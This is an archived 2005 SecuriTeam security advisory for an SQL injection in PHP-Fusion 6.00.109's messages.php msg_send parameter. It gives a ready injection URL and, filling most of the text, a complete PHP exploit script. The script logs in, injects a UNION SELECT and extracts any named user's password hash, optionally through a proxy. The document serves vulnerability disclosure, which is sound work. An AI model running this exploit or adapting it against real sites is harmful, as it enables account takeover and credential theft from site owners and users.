The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[UNIX] PHP-Fusion msg_send SQL Injection


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 29 Sep 2005 10:36:57 +0200
Subject: [UNIX] PHP-Fusion msg_send SQL Injection
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20050929091128.590B158A5@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -




  PHP-Fusion msg_send SQL Injection
------------------------------------------------------------------------


SUMMARY

 <http://www.php-fusion.co.uk/>; PHP-Fusion - "A light-weight open-source 
content management system (CMS) written in PHP. It utilizes a MySQL 
database to store your site content and includes a simple, comprehensive 
administration system."

An SQL Injection vulnerability has been discovered in PHP-Fusion's 
messages.php script.

DETAILS

Vulnerable Systems:
 * PHP-Fusion version 6.00.109

If magic_quotes set to off, PHP-Fusion vulnerable to SQL Injection.

Example:
http://[target]/[path_to_Php_Fusion]/messages.php?msg_send=' UNION SELECT 
user_password FROM fusion_users WHERE user_name='[admin_username]'/*

Now hash will be showed in "To:" field when you post a private message.

Exploit:
<?php
# 19.17 28/09/2005 #
# #
# -- PhpF6_00_109xpl.php #
# #
# PHP-Fusion v6.00.109 SQL Injection / admin|users credentials disclosure 
#
# #
# by rgod #
# site: http://rgod.altervista.org #
# #
# mphhh, private messages again...tze,tze #
# #
# make these changes in php.ini if you have troubles #
# to launch this script: #
# allow_call_time_pass_reference = on #
# register_globals = on #
# #
# usage: launch this script from Apache, fill requested fields, then #
# go! #
# #
# Sun-Tzu: "Therefore the clever combatant imposes his will on the enemy, 
#
# but does not allow the enemy's will to be imposed on him" #

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);

echo'<head><title> *** PHP-Fusion v6.00.109 SQL Injection *** </title> 
<meta
http-equiv= "Content-Type" content="text/html; charset=iso-8859-1"> <style
type="text/css"><!-- body,td,th {color:#00FF00;} body{background-color: 
#000000;}
Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 
10px; }
Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: 
bold;
font-style: italic; } --> </style></head><body> <p class="Stile6"> 
Php-Fusion v6.
00.109 SQL Injection / admin|user credentials disclosure </p><p 
class="Stile6">
a script by rgod at <a href="http://rgod.altervista.org" target="_blank">
http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%"> 
<form
name="form1" method="post" 
action="'.$SERVER[PHP_SELF].'?path=value&host=value
&port=value&proxy=value&user=value&pass=value&username=value"> <p> <input
type="text" name="host"><span class="Stile5"> hostname ( ex: 
www.sitename.com )
</span></p> <p> <input type="text" name="path"><span class="Stile5"> path 
(ex:
/phpfusion/ or just /)</span></p><p> <input type="text" name="port"> <span
class="Stile5">specify a port other than 80 (default value)</span></p><p> 
<input
type="text" name="user"> <span class="Stile5">your username </span> </p> 
<p>
<input type="text" name="pass"> <span class="Stile5">your password ( to 
get a
valid session cookie) </span></p><p><input type="text" name="username"> 
<span
class="Stile5">user whom you want the password </span></p><p><input 
type="text"
name="proxy"> <span class="Stile5"> send exploit trough an HTTP proxy 
</span>
</p> <p> <input type="submit"name="Submit" value="go!"> </p></form> </td> 
</tr>
</table></body></html>';

function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
       $ji=0;
       $ci++;
       echo "<td> </td>";
       for ($li=0; $li<=15; $li++)
           { echo "<td>".$headeri[$li+$ki]."</td>";
  }
      $ki=$ki+16;
      echo "</tr><tr>";
      }
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
           { echo "<td>&nbsp&nbsp</td>";
            }

for ($li=$ci*16; $li<=strlen($headeri); $li++)
           { echo "<td>".$headeri[$li]."</td>";
  }
echo "</tr></table>";
}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacket()
{
global $proxy, $host, $port, $html, $packet;
if ($proxy=='')
      {$ock=fsockopen(gethostbyname($host),$port);}
       else
      {
  if (!eregi($proxy_regex,$proxy))
  {echo htmlentities($proxy).' -> not a valid proxy...';
   die;
  }
  $parts=explode(':',$proxy);
      echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
      $ock=fsockopen($parts[0],$parts[1]);
  if (!$ock) { echo 'No response from proxy...';
die;
    }
  }
fputs($ock,$packet);
if ($proxy=='')
 {
  $html='';
  while (!feof($ock))
   {
    $html.=fgets($ock);
   }
 }
else
 {
  $html='';
  while ((!feof($ock)) or 
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
  {
   $html.=fread($ock,2048);
  }
 }
fclose($ock);
echo nl2br(htmlentities($html));
}


if (($path<>'') and ($host<>'') and ($user<>'') and ($pass<>'') and 
($username<>''))
{
 if ($port=='') {$port=80;}

#STEP 1 -> login, to retrieve a session cookie...

$data="user_name=".urlencode(trim($user)). 
"&user_pass=".urlencode(trim($pass))."&login=Login";
if ($proxy=='')
{$packet="POST ".$path."news.php HTTP/1.1\r\n";}
else
{$packet="POST http://".$host.$path."news.php HTTP/1.1\r\n";}

$packet="Referer: http://".$host.$path."/news.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Keep-Alive\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Cookie: fusion_visited=yes; 
PHPSESSID=44ab49664b56b97036425427b1ffb8cf\r\n\r\n";
$packet.=$data;
show($packet);
sendpacket($packet);
$temp=explode("Set-Cookie: ",$html);
$temp2=explode(' ',$temp[1]);
$cookie=$temp2[0];
echo '<br>Your cookie: '.htmlentities($cookie);

# STEP 2 -> SQL Injection, now retrieve the MD5 password hash from 
database
$username=str_replace("'","",$username);
$sql="' UNION SELECT user_password FROM fusion_users WHERE 
user_name='".trim($username)."'/*";

if ($proxy=='')
{$packet="GET ".$path."messages.php?msg_send=".urlencode($sql)." 
HTTP/1.1\r\n";}
else
{$packet="GET 
http://".$host.$path."messages.php?msg_send=".urlencode($sql)." 
HTTP/1.1\r\n";}

$packet.="User-Agent: GameBoy, Powered by Nintendo\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, 
image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, 
*;q=0.1\r\n";
$packet.="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Cookie2: \$Version=1\r\n";
$packet.="Connection: Keep-Alive, TE\r\n";
$packet.="TE: deflate, gzip, chunked, identity, trailers\r\n\r\n";
show($packet);
sendpacket($packet);
if (eregi('For Members only',$html)) {echo 'You have to specify a valid 
session cookie...'; die; }
$temp=explode("'Click to view the senders profile'>",$html);
$temp2=explode("</a>",$temp[1]);
$hash=$temp2[0];
echo '<br>Username: '.htmlentities($username).' Password hash: '.$hash;

}
else
{ echo '<br> Fill requested fields, optionally specify a proxy...';}

?>


ADDITIONAL INFORMATION

The information has been provided by  <mailto:retrogod@aliceposta.it.> 
rgod.




This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: [email protected] In order to subscribe to the mailing list, simply forward this email to: [email protected]

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру